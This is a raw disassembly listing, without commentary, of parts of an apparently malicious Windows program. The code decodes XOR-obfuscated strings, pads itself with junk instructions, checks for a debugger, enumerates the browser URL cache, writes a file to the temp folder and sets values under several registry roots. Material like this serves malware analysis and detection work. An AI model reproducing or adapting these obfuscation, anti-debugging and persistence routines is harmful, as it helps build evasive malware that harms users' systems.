var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp ; DATA XREF: sub_440595�r
push ecx
push eax
push esi
loc_405264: ; DATA XREF: sub_4405A1�r
push edi
mov esi, [ebp+arg_4]
loc_405268: ; DATA XREF: sub_4405AD�r
push esi
push [ebp+arg_0]
loc_40526C: ; DATA XREF: sub_4405B9�r sub_4405C5�r
mov eax, dword_4422D0
lea eax, ds:4197C0h[eax] ; DATA XREF: sub_4405D1�r
loc_405278: ; DATA XREF: sub_4405DD�r
push eax
call sub_40C998 ; DATA XREF: sub_4405E9�r
add esp, 0Ch ; DATA XREF: sub_4405F5�r
mov [ebp+var_4], 43h ; DATA XREF: sub_440601�r
xor edi, edi
jmp short loc_4052A3
; ---------------------------------------------------------------------------
loc_40528C: ; CODE XREF: sub_40525E+47�j
; DATA XREF: sub_44060D�r
mov eax, dword_4422D0
add eax, edi
lea eax, ds:4197C0h[eax]
movsx edx, byte ptr [eax] ; DATA XREF: sub_440619�r
xor edx, 69h
mov [eax], dl
inc edi
loc_4052A3: ; CODE XREF: sub_40525E+2C�j
cmp edi, esi
jl short loc_40528C
mov [ebp+var_8], 4 ; DATA XREF: sub_4406D5�r sub_4406E1�r
mov eax, dword_4422D0 ; DATA XREF: sub_4406ED�r
add eax, esi ; DATA XREF: sub_4406F9�r
mov byte ptr ds:dword_4197C0[eax], 0 ; DATA XREF: sub_440705�r
; sub_440711�r
xor edi, edi
mov edi, dword_4422D0 ; DATA XREF: sub_44071D�r sub_440729�r
mov eax, edi
lea eax, [eax+esi+2] ; DATA XREF: sub_440735�r
mov dword_4422D0, eax ; DATA XREF: sub_440741�r
loc_4052D0: ; DATA XREF: sub_44074D�r sub_440759�r
add dword_4422D0, 3
cmp dword_4422D0, 0DDBh ; DATA XREF: sub_440765�r
; sub_440771�r ...
jle short loc_4052EA
and dword_4422D0, 0 ; DATA XREF: sub_440789�r sub_440795�r
loc_4052EA: ; CODE XREF: sub_40525E+83�j
; DATA XREF: sub_4407A1�r
lea eax, dword_4197C0[edi]
loc_4052F0: ; DATA XREF: sub_4407AD�r
pop edi
pop esi
leave
retn
sub_40525E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052F4 proc near ; CODE XREF: sub_4062A9+4BA�p
; sub_4062A9+4D7�p
; DATA XREF: ...
var_18 = byte ptr -18h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_9 = byte ptr -9
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h ; DATA XREF: sub_4407C5�r
push ebx
push esi
push edi
lea edi, [ebp+var_9]
lea esi, aJ3C7 ; DATA XREF: sub_4407D1�r
; "j~3 c7"
movsd
movsd
loc_405308: ; DATA XREF: sub_4407DD�r sub_4407E9�r
mov ax, word_4422E0
mov [ebp+var_12], ax ; DATA XREF: sub_4407F5�r
push 0
loc_405314: ; DATA XREF: sub_440801�r sub_44080D�r
push 80h
push 4
push 0 ; DATA XREF: sub_440819�r
push 0
push 0C0000000h ; DATA XREF: sub_440825�r
loc_405324: ; DATA XREF: sub_440831�r
push [ebp+arg_0]
call sub_40C650 ; CreateFileA
mov ebx, eax
mov [ebp+var_1], 7Bh ; DATA XREF: sub_44083D�r
add [ebp+var_1], 7 ; DATA XREF: sub_440849�r
cmp ebx, 0FFFFFFFFh ; DATA XREF: sub_440855�r
jnz short loc_40533F
xor eax, eax ; DATA XREF: sub_440861�r
jmp short loc_405386
; ---------------------------------------------------------------------------
loc_40533F: ; CODE XREF: sub_4052F4+45�j
; DATA XREF: sub_44086D�r
call sub_40C548 ; GetTickCount
loc_405344: ; DATA XREF: sub_440879�r
push 2
push 0
loc_405348: ; DATA XREF: sub_440885�r
push 0
push ebx
call sub_40C65C ; DATA XREF: sub_440891�r
loc_405350: ; DATA XREF: sub_44089D�r sub_4408A9�r
call sub_40C554 ; GetVersion
push 0
lea eax, [ebp+var_10] ; DATA XREF: sub_4408B5�r
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_40C6C8 ; DATA XREF: sub_4408C1�r
call sub_40C4E8 ; DATA XREF: sub_4408CD�r
loc_40536C: ; DATA XREF: sub_4408D9�r
push ebx
call sub_40C530 ; DATA XREF: sub_4408E5�r
lea edi, [ebp+var_18] ; DATA XREF: sub_4408F1�r
lea esi, aI ; DATA XREF: sub_4408FD�r
; ";i '&"
mov ecx, 3 ; DATA XREF: sub_440909�r
loc_405380: ; DATA XREF: sub_440915�r
rep movsw
xor eax, eax ; DATA XREF: sub_440921�r
inc eax
loc_405386: ; CODE XREF: sub_4052F4+49�j
pop edi
pop esi
loc_405388: ; DATA XREF: sub_44092D�r
pop ebx
leave
retn
sub_4052F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538B proc near ; CODE XREF: sub_4062A9+40D�p
var_2F52 = word ptr -2F52h
var_2F50 = word ptr -2F50h
var_2F4E = word ptr -2F4Eh
var_2F4B = byte ptr -2F4Bh
var_2F46 = word ptr -2F46h
var_2F44 = byte ptr -2F44h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
loc_40538C: ; DATA XREF: sub_440939�r
mov ebp, esp
mov eax, 2F54h ; DATA XREF: sub_440945�r
call sub_40C43C ; DATA XREF: sub_440951�r
loc_405398: ; DATA XREF: sub_44095D�r
push ebx
push esi
push edi
call sub_40C554 ; GetVersion
lea edi, [ebp+var_2F4B]
lea esi, a4ct ; ",4Ct"
mov ecx, 5
rep movsb
call sub_40C4C4 ; GetCurrentThreadId
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_40C45C
call sub_40C4C4 ; GetCurrentThreadId
push 1
push offset byte_447353
call sub_40525E
mov edi, 0Fh
sub edi, dword_4422CC
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
call sub_4017D2
add esp, 14h
mov edi, eax
mov [ebp+var_2F46], di
call sub_40C4C4 ; GetCurrentThreadId
movzx eax, [ebp+var_2F46]
cmp eax, 0FFFFh
jz short loc_40541F
movzx eax, [ebp+var_2F46]
mov [ebp+eax+var_2F43], 0
loc_40541F: ; CODE XREF: sub_40538B+83�j
mov [ebp+var_2F44], 81h
movzx eax, [ebp+var_2F44]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2F44], al
mov [ebp+var_1F44], 1F40h
push 3
push offset off_44734F
call sub_40525E
add esp, 8
lea edi, [ebp+var_1F44]
push edi
lea edi, [ebp+var_1F40]
push edi
push eax
call sub_40B9BC ; FindFirstUrlCacheEntryA
mov ebx, eax
or eax, eax
jz loc_405554
mov ax, word_4422ED
mov [ebp+var_2F4E+1], ax
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C968
add esp, 8
or eax, eax
jnz short loc_4054B6
call sub_40C554 ; GetVersion
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C45C
call sub_40C5D8 ; IsDebuggerPresent
xor eax, eax
inc eax
jmp loc_405554
; ---------------------------------------------------------------------------
loc_4054B6: ; CODE XREF: sub_40538B+109�j
; sub_40538B:loc_40554D�j
mov [ebp+var_2F50], 178Ch
movzx eax, [ebp+var_2F50]
imul eax, 2051h
mov [ebp+var_2F50], ax
mov [ebp+var_1F44], 1F40h
mov [ebp+var_2F52], 3F69h
movzx eax, [ebp+var_2F52]
imul eax, 7EFh
mov [ebp+var_2F52], ax
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push ebx
call sub_40B9C8 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_405552
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C968
add esp, 8
or eax, eax
jnz short loc_40554D
call sub_40C518 ; GetProcessHeap
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C45C
call sub_40C5D8 ; IsDebuggerPresent
xor eax, eax
inc eax
jmp short loc_405554
; ---------------------------------------------------------------------------
loc_40554D: ; CODE XREF: sub_40538B+1A3�j
jmp loc_4054B6
; ---------------------------------------------------------------------------
loc_405552: ; CODE XREF: sub_40538B+185�j
xor eax, eax
loc_405554: ; CODE XREF: sub_40538B+DF�j
; sub_40538B+126�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40538B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405559 proc near ; CODE XREF: sub_405636+5C6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_11 = byte ptr -11h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_11]
lea esi, a?I ; "?<I*"
mov ecx, 5
rep movsb
push [ebp+arg_0]
call sub_40C6E0 ; lstrlenA
mov [ebp+var_8], eax
call sub_40C554 ; GetVersion
mov edi, [ebp+var_8]
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40C5FC ; LocalAlloc
mov [ebp+var_C], eax
xor ebx, ebx
jmp short loc_4055B5
; ---------------------------------------------------------------------------
loc_405599: ; CODE XREF: sub_405559+5F�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+ebx]
xor eax, 71h
or eax, eax
jz short loc_4055B4
mov eax, ebx
add eax, [ebp+arg_0]
movzx edx, byte ptr [eax]
xor edx, 71h
mov [eax], dl
loc_4055B4: ; CODE XREF: sub_405559+4C�j
inc ebx
loc_4055B5: ; CODE XREF: sub_405559+3E�j
cmp ebx, [ebp+var_8]
jb short loc_405599
call sub_40C4B8 ; GetCurrentProcessId
mov [ebp+var_2], 0
jmp short loc_405620
; ---------------------------------------------------------------------------
loc_4055C7: ; CODE XREF: sub_405559+CE�j
push 6
push offset dword_447348
call sub_40525E
mov [ebp+var_18], eax
movzx edi, [ebp+var_2]
mov esi, [ebp+arg_0]
movzx edi, byte ptr [esi+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_1C], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_18]
push esi
push edi
call sub_40C9D4
add esp, 1Ch
inc [ebp+var_2]
loc_405620: ; CODE XREF: sub_405559+6C�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_4055C7
call sub_40C4C4 ; GetCurrentThreadId
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_405559 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405636 proc near ; CODE XREF: sub_4062A9+16A�p
var_30090 = dword ptr -30090h
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_3007D = byte ptr -3007Dh
var_3007A = word ptr -3007Ah
var_30078 = dword ptr -30078h
var_30074 = dword ptr -30074h
var_30070 = dword ptr -30070h
var_3006C = dword ptr -3006Ch
var_30068 = dword ptr -30068h
var_30064 = dword ptr -30064h
var_3005D = byte ptr -3005Dh
var_3005C = word ptr -3005Ch
var_30057 = byte ptr -30057h
var_30050 = word ptr -30050h
var_3004E = byte ptr -3004Eh
var_3004D = byte ptr -3004Dh
var_3004C = byte ptr -3004Ch
var_30045 = dword ptr -30045h
var_30041 = byte ptr -30041h
var_30040 = byte ptr -30040h
var_30036 = byte ptr -30036h
var_3002C = dword ptr -3002Ch
var_30025 = byte ptr -30025h
var_30024 = dword ptr -30024h
var_30020 = dword ptr -30020h
var_3001C = dword ptr -3001Ch
var_30018 = dword ptr -30018h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 30090h
call sub_40C43C
push ebx
push esi
push edi
lea edi, [ebp+var_30041]
lea esi, byte_4422F4
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_30020], 0
call sub_40C4E8 ; RtlGetLastWin32Error
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401A43
add esp, 8
mov ebx, eax
call sub_40C5D8 ; IsDebuggerPresent
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_40569D
or ebx, ebx
jz short loc_40569D
cmp [ebp+arg_14], eax
jb short loc_4056D8
loc_40569D: ; CODE XREF: sub_405636+5C�j
; sub_405636+60�j
mov [ebp+var_3005D], 19h
add [ebp+var_3005D], 41h
push ebx
call sub_40C608 ; LocalFree
mov [ebp+var_3005C], 3D58h
movzx eax, [ebp+var_3005C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3005C], ax
mov [ebp+var_30020], 1
loc_4056D8: ; CODE XREF: sub_405636+65�j
push [ebp+arg_C]
call sub_40C6E0 ; lstrlenA
mov [ebp-30060h], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_30064], eax
mov edi, [ebp-30060h]
imul edi, [ebp-30060h], 32h
mov esi, [ebp+var_30064]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40C5FC ; LocalAlloc
mov [ebp+var_20008], eax
mov eax, dword_4422F5
mov [ebp+var_30045], eax
lea edi, [ebp+var_3004C]
lea esi, byte_4422F9
mov ecx, 7
rep movsb
push [ebp+arg_0]
push 104h
call sub_40C53C ; GetTempPathA
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+arg_0]
mov [ebp+var_30068], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40575D: ; CODE XREF: sub_405636+12C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40575D
mov edi, eax
mov esi, 16h
sub esi, dword_4422CC
push esi
mov esi, [ebp+var_30068]
add esi, edi
push esi
call sub_4016D2
add esp, 8
mov [ebp+var_30025], 0CFh
add [ebp+var_30025], 0BFh
push 4
push offset byte_447343
call sub_40525E
add esp, 8
push eax
push [ebp+arg_0]
call sub_40C9F8
add esp, 8
mov [ebp+var_3002C], 1317h
add [ebp+var_3002C], 186Ah
push 6
push offset dword_44733C
call sub_40525E
add esp, 8
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C548 ; GetTickCount
push 6
push offset byte_447335
call sub_40525E
add esp, 8
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C5D8 ; IsDebuggerPresent
push 13h
push offset byte_447321
call sub_40525E
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
add esp, 10h
lea edi, [ebp+var_3004D]
lea esi, byte_442300
mov ecx, 1
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
push 7
push offset word_44730A
call sub_40525E
add esp, 8
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
lea edi, [ebp+var_3004E]
lea esi, byte_442301
mov ecx, 1
rep movsb
push 6
push offset byte_447303
call sub_40525E
add esp, 8
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C554 ; GetVersion
mov ax, word_442302
mov [ebp+var_30050], ax
push 5
push offset byte_4472FD
call sub_40525E
add esp, 8
mov [ebp+var_3006C], eax
call sub_40C9BC
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_3006C]
push [ebp+var_3006C]
lea edi, [ebp+var_30036]
push edi
call sub_40C9D4
add esp, 0Ch
push 2Ah
push offset word_4472D2
call sub_40525E
add esp, 8
lea edi, [ebp+var_30036]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
add esp, 10h
lea edi, [ebp+var_30057]
lea esi, a8_V9t ; "8_|9t"
mov ecx, 7
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C5D8 ; IsDebuggerPresent
push 2Dh
push offset dword_4472A4
call sub_40525E
add esp, 8
mov [ebp+var_30070], eax
call sub_40C9BC
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30070]
push [ebp+var_30070]
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
add esp, 0Ch
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_30020], 0
jnz loc_405CC1
cmp [ebp+arg_18], 0
jz loc_405B09
call sub_40C518 ; GetProcessHeap
and [ebp+var_30074], 0
jmp loc_405AEC
; ---------------------------------------------------------------------------
loc_4059CF: ; CODE XREF: sub_405636+4C2�j
call sub_40C4B8 ; GetCurrentProcessId
mov [ebp+var_10000], 0
call sub_40C4B8 ; GetCurrentProcessId
and [ebp+var_30078], 0
jmp loc_405A8E
; ---------------------------------------------------------------------------
loc_4059EC: ; CODE XREF: sub_405636+462�j
lea edi, [ebp+var_3007D]
lea esi, aAblx ; "BLX"
mov ecx, 5
rep movsb
mov eax, [ebp+var_30074]
add eax, [ebp+var_30078]
cmp eax, [ebp+var_10004]
jnb loc_405A9E
call sub_40C548 ; GetTickCount
push 6
push offset dword_447348
call sub_40525E
mov [ebp+var_30084], eax
mov edi, [ebp+var_30074]
add edi, [ebp+var_30078]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_30088], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_30084]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40C9D4
add esp, 1Ch
inc [ebp+var_30078]
loc_405A8E: ; CODE XREF: sub_405636+3B1�j
cmp [ebp+var_30078], 80h
jb loc_4059EC
loc_405A9E: ; CODE XREF: sub_405636+3DB�j
push 30h
push offset byte_447273
call sub_40525E
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404970
add esp, 24h
add [ebp+var_30074], 80h
inc [ebp+var_2000C]
loc_405AEC: ; CODE XREF: sub_405636+394�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30074], eax
jb loc_4059CF
mov [ebp+var_30014], eax
jmp loc_405CC1
; ---------------------------------------------------------------------------
loc_405B09: ; CODE XREF: sub_405636+382�j
lea edi, [ebp+var_30078+1]
lea esi, aYeqbi ; " YeQI"
mov ecx, 7
rep movsb
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405C9D
; ---------------------------------------------------------------------------
loc_405B2A: ; CODE XREF: sub_405636+685�j
mov [ebp+var_3007A], 7627h
movzx eax, [ebp+var_3007A]
imul eax, 1668h
mov [ebp+var_3007A], ax
cmp [ebp+var_10000], 0
jz loc_405C9D
mov eax, dword_442317
mov [ebp+var_3008C], eax
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405CC1
call sub_40C518 ; GetProcessHeap
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset byte_44726F
call sub_40525E
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40C9D4
add esp, 14h
mov dword ptr [ebp-30080h], 53C3h
sub dword ptr [ebp-30080h], 51DCh
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405BC0: ; CODE XREF: sub_405636+58F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405BC0
mov edi, eax
mov word ptr [ebp+var_30088], di
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_10000]
push eax
movzx eax, word ptr [ebp+var_30088]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C45C
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_3000C]
push eax
call sub_405559
add esp, 4
mov [ebp+var_30010], eax
mov [ebp+var_30084], 51C9h
mov eax, 3C12h
mul [ebp+var_30084]
mov [ebp+var_30090], eax
mov eax, [ebp+var_30090]
mov [ebp+var_30084], eax
push 30h
push offset byte_447273
call sub_40525E
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
add esp, 14h
mov byte ptr [ebp+var_30088+3], 0B9h
sub byte ptr [ebp+var_30088+3], 65h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404970
add esp, 8
call sub_40C4C4 ; GetCurrentThreadId
push [ebp+var_30010]
call sub_40C608 ; LocalFree
call sub_40C4B8 ; GetCurrentProcessId
inc [ebp+var_2000C]
loc_405C9D: ; CODE XREF: sub_405636+4EF�j
; sub_405636+518�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401B83
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_405B2A
loc_405CC1: ; CODE XREF: sub_405636+378�j
; sub_405636+4CE�j ...
push 1Eh
push offset dword_447250
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404970
call sub_40C554 ; GetVersion
push 7
push offset dword_447248
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404970
call sub_40C518 ; GetProcessHeap
push 8
push offset byte_44723F
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404657
call sub_40C4C4 ; GetCurrentThreadId
push 6
push offset dword_447238
call sub_40525E
mov [ebp+var_30074], eax
call sub_40C9BC
mov [ebp+var_30078], eax
call sub_40C9BC
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30078]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_30074]
push edi
lea edi, [ebp+var_30040]
push edi
call sub_40C9D4
push 0Eh
push offset byte_447229
call sub_40525E
lea edi, [ebp+var_30040]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
call sub_40C5D8 ; IsDebuggerPresent
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404657
push 15h
push offset byte_447213
call sub_40525E
lea edi, [ebp+var_30036]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404657
call sub_40C4B8 ; GetCurrentProcessId
push 1
push offset byte_447211
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404657
mov [ebp+var_30018], 17D8h
mov eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov [ebp+var_30018], edx
push 16h
push offset word_4471FA
call sub_40525E
mov [ebp-3007Ch], eax
call sub_40C9BC
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_30040]
push edi
mov edi, [ebp-3007Ch]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40C9D4
mov [ebp+var_3001C], 35CBh
mov eax, [ebp+var_3001C]
mov edx, eax
add edx, eax
mov [ebp+var_3001C], edx
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404657
push 9
push offset dword_4471F0
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404970
call sub_40C4C4 ; GetCurrentThreadId
push 7
push offset dword_4471E8
call sub_40525E
push eax
push [ebp+var_20008]
call sub_404970
call sub_40C548 ; GetTickCount
push 7
push offset dword_4471E0
call sub_40525E
push eax
push [ebp+var_20008]
call sub_40C9F8
push [ebp+arg_0]
call sub_4034C6
add esp, 0E4h
call sub_40C554 ; GetVersion
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40C650 ; CreateFileA
mov [ebp+var_30024], eax
push [ebp+var_20008]
call sub_40C6E0 ; lstrlenA
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_30024]
call sub_40C6C8 ; WriteFile
push [ebp+var_30024]
call sub_40C530 ; CloseHandle
push [ebp+var_20008]
call sub_40C608 ; LocalFree
cmp [ebp+var_30020], 0
jnz short loc_405F4E
push ebx
call sub_40C608 ; LocalFree
jmp short loc_405F53
; ---------------------------------------------------------------------------
loc_405F4E: ; CODE XREF: sub_405636+90E�j
or eax, 0FFFFFFFFh
jmp short loc_405F59
; ---------------------------------------------------------------------------
loc_405F53: ; CODE XREF: sub_405636+916�j
mov eax, [ebp+var_30014]
loc_405F59: ; CODE XREF: sub_405636+91B�j
pop edi
pop esi
pop ebx
leave
retn
sub_405636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F5E proc near ; CODE XREF: sub_4062A9:loc_4063C7�p
var_211F = byte ptr -211Fh
var_211E = byte ptr -211Eh
var_111F = byte ptr -111Fh
var_128 = dword ptr -128h
var_122 = dword ptr -122h
var_11D = byte ptr -11Dh
var_11C = dword ptr -11Ch
var_117 = byte ptr -117h
var_112 = byte ptr -112h
var_10A = word ptr -10Ah
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2120h
call sub_40C43C
push ebx
push esi
push edi
call sub_40C518 ; GetProcessHeap
lea edi, [ebp+var_112]
lea esi, aB@wfed0 ; "@WFed0"
movsd
movsd
lea edi, [ebp+var_117]
lea esi, aKPo ; "k`Po"
mov ecx, 5
rep movsb
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_4060F4
; ---------------------------------------------------------------------------
loc_405FA7: ; CODE XREF: sub_405F5E+19E�j
call sub_40C554 ; GetVersion
push 44h
push offset a5 ; ":&/=>(;,5$"
call sub_40525E
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40C9D4
call sub_40C4C4 ; GetCurrentThreadId
push 4
push offset aX_yx ; "X_YX"
call sub_40525E
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015B0
call sub_40C4C4 ; GetCurrentThreadId
push 4
push offset aX_yx ; "X_YX"
call sub_40525E
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015B0
mov eax, dword_442328
mov [ebp+var_122+1], eax
push 4Dh
push offset dword_447148
call sub_40525E
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40C9D4
mov [ebp+var_11C], 178Ch
mov eax, 5729h
mul [ebp+var_11C]
mov [ebp+var_128], eax
mov [ebp+var_11C], eax
push 4
push offset aX_yx ; "X_YX"
call sub_40525E
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015B0
mov [ebp+var_11D], 0C4h
movzx eax, [ebp+var_11D]
imul eax, 67FBh
mov [ebp+var_11D], al
push 4
push offset aX_yx ; "X_YX"
call sub_40525E
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015B0
add esp, 0A8h
call sub_40C4E8 ; RtlGetLastWin32Error
add [ebp+var_101], 1
loc_4060F4: ; CODE XREF: sub_405F5E+44�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_405FA7
call sub_40C554 ; GetVersion
cmp eax, 80000000h
jb short loc_406172
call sub_40C4C4 ; GetCurrentThreadId
push 4Ch
push offset aG55 ; "G-,/(<%=5:&/=>(;,5$"
call sub_40525E
mov [ebp+var_11C], eax
push 10h
push offset word_4470EA
call sub_40525E
mov [ebp+var_122+2], eax
push 3
push offset word_4470E6
call sub_40525E
push 1
mov edi, 12h
sub edi, dword_4422CC
push edi
push eax
mov edi, [ebp+var_122+2]
push edi
mov edi, [ebp+var_11C]
push edi
push 80000003h
call sub_4015B0
add esp, 30h
jmp loc_406201
; ---------------------------------------------------------------------------
loc_406172: ; CODE XREF: sub_405F5E+1AE�j
call sub_40C5D8 ; IsDebuggerPresent
lea edi, [ebp+var_211F]
lea esi, byte_44232C
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_111F]
push eax
call sub_4051C3
call sub_40C4B8 ; GetCurrentProcessId
push 59h
push offset dword_44708C
call sub_40525E
lea edi, [ebp+var_111F]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
call sub_40C9D4
mov word ptr [ebp+var_11C+2], 2DF5h
inc word ptr [ebp+var_11C+2]
and [ebp+var_122+2], 0
push 0Ch
push offset byte_44707F
call sub_40525E
push 4
push 4
lea edi, [ebp+var_122+2]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
push 80000003h
call sub_4015B0
add esp, 38h
call sub_40C518 ; GetProcessHeap
